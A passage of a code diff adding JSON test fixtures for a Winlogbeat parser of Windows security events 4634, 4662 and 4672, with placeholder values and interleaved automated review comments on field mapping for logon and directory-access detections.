using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": 
"{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "event": { + "action": "Logoff", + "code": "4634", + "kind": "event", + "module": "security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. 
It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.",
+ "outcome": "success",
+ "provider": "Microsoft-Windows-Security-Auditing"
+ },
+ "@timestamp": "2024-11-12T08:42:47.895000Z",
+ "action": {
+ "id": 4634,
+ "outcome": "success",
+ "properties": {
+ "LogonType": "3",
+ "TargetDomainName": "J_DOE",
+ "TargetLogonId": "0x5ed35bb6",
+ "TargetUserName": "ACCOUNT",
+ "TargetUserSid": "S-1-2-3"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+ "id": "12345678-abcd-ef90-1234-abcdef123456",
+ "name": "PC01",
+ "type": "filebeat",
+ "version": "8.14.1"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "pc01",
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8"
+ ],
+ "mac": [
+ "00-11-22-33-44-55"
+ ],
+ "name": "pc01",
+ "os": {
+ "build": "17763.6414",
+ "family": "windows",
+ "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+ "name": "Windows Server 2019 Standard",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "pc01"
+ ],
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8"
+ ],
+ "user": [
+ "ACCOUNT"
+ ]
+ },
+ "user": {
+ "domain": "J_DOE",
+ "id": "S-1-2-3",
+ "name": "ACCOUNT",
+ "target": {
+ "domain": "J_DOE",
+ "name": "ACCOUNT"
+ }
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "PC01.jdoe.com",
+ "event_id": "4634",
+ "keywords": [
+ "Audit Success"
+ ],
+ "logon": {
+ "id": "0x5ed35bb6",
+ "type": "Network"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 704,
+ "thread": {
+ "id": 6336
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "15983780774",
+ "task": "Logoff"
+ }
+ }
+}
\ No newline at end of file
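Review bot: The expected `event` block for 4634 keeps the raw `"action": "Logoff"` and carries no `category` or `type`, while the 4624 and 4625 fixtures in this commit expect the normalised `authentication_network` action with `"category": ["authentication"]` and `"type": ["start"]`; the matching expectation for a logoff would be `"category": ["authentication"]` with `"type": ["end"]`, so that session start and end can be paired on `winlog.logon.id` (`0x5ed35bb6` here, against the `TargetLogonId` of the corresponding 4624). If the parser intentionally leaves 4634 unnormalised, the fixture is right to pin that, but the asymmetry deserves a sentence in the commit description. The logged-off account is also copied into both `user` and `user.target`, unlike 4624 where `user` is the subject; that may be deliberate since 4634 has no separate subject, and I cannot confirm it from the diff.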
diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json
new file mode 100644
index 000000000..3f1de8e53
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4662.json
@@ -0,0 +1,105 @@ +{ + "input": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s 
:\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic 
Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler 
l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object 
Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": "%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + 
"SubjectLogonId": "0xc2b9d138", + "SubjectUserName": "ACCOUNT01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab", + "name": "ACCOUNT01", + "type": "winlogbeat", + "version": "8.12.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "account01", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "account01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "account01" + ], + "ip": [ + "1.2.3.4" + ] + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT01.domain.local", + "event_id": "4662", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0xc2b9d138" + }, + "opcode": "Informations", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "476080242", + "task": "Directory Service Access" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json new file mode 100644 index 000000000..ec935a02c --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4672.json 
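Review bot: The `expected` block pins a result in which `SubjectUserName`, `SubjectUserSid` and `SubjectDomainName` are not promoted to `user.name`, `user.id`, `user.domain` or `related.user`, although the sibling 4672 and 4689 fixtures in this same change do get `user.*` from the very same Subject* fields (with the trailing `$` stripped). A 4662 on a DS object with `AccessMask` `0x100` is the event that replication-rights / DCSync detections key on, so a rule pivoting on `user.name` would never see the subject of this one. Unless the omission is deliberate, the parser should map the Subject* fields for 4662 as it does for 4672/4689, and the fixture should then expect `"user": {"domain": "DOMAIN", "id": "S-1-2-3", "name": "ACCOUNT01"}` and `"related": {"user": ["ACCOUNT01"]}` alongside the existing `hosts`/`ip`. Keeping `ObjectType` and `Properties` verbatim under `action.properties` is fine, as the GUIDs are what such rules match on.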
@@ -0,0 +1,82 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID 
d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
